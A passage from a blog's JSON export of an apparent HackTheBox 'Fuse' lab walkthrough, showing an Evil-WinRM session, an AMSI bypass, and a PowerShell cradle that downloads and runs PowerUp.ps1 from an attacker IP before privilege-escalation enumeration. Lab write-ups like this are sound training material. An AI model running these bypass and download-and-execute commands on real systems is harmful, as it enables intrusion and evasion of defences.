\nData: For more information, check Evil-WinRM Github: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> whoami\nfabricorp\\svc-print<\/code><\/pre>\n<p>After that I read my flag and started investigating.<\/p>\n<pre><code class=\"language-sh\">*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> Bypass-4MSI\n[+] Success!\n\n*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> iex ((New-Object Net.WebClient).DownloadString('http:\/\/10.10.14.28\/PowerUp.ps1'));\n*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> Invoke-PrivescAudit\n\nPrivilege   : SeLoadDriverPrivilege\nAttributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nTokenHandle : 7116\nProcessId   : 4044\nName        : 4044\nCheck       : Process Token Privileges\n\nAccess denied \nAt line:2066 char:21\n+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...\n+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException\n    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\nAccess denied \nAt line:2133 char:5\n+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...\n+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException\n    + FullyQualifiedErrorId : 
GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\nCannot open Service Control Manager on computer '.'. This operation might require other privileges.\nAt line:2189 char:5\n+     Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeCo ...\n+     ~~~~~~~~~~~\n    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException\n    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand\nModifiablePath    : C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\nIdentityReference : FABRICORP\\svc-print\nPermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}\n%PATH%            : C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\nName              : C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\nCheck             : %PATH% .dll Hijacks\nAbuseFunction     : Write-HijackDll -DllPath 'C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\\wlbsctrl.dll'\n\nDefaultDomainName    : FABRICORP\nDefaultUserName      : administrator\nDefaultPassword      :\nAltDefaultDomainName :\nAltDefaultUserName   :\nAltDefaultPassword   :\nCheck                : Registry Autologons\n<\/code><\/pre>\n<p>What comes next is easy but long. Because it is an attack I already know, and because I could not be bothered, I left the machine unfinished. We have the privilege to load drivers. 
Our keyword is <strong>SeLoadDriverPrivilege<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Level OS Logo Fuse &#8211; HTB Hard Windows Walkthrough nmap scan: Not shown: 65514 filtered ports PORT STATE SERVICE VERSION 53\/tcp open domain&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/29\/fuse\/\">Continue reading<span class=\"screen-reader-text\">Fuse<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,498],"tags":[617,616],"class_list":["post-1572","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-walkthrough","tag-kerbrute","tag-seloaddriverprivilege","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1572"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1572\/revisions"}],"predecessor-version":[{"id":1573,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1572\/revisions\/1573"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-
json\/wp\/v2\/tags?post=1572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}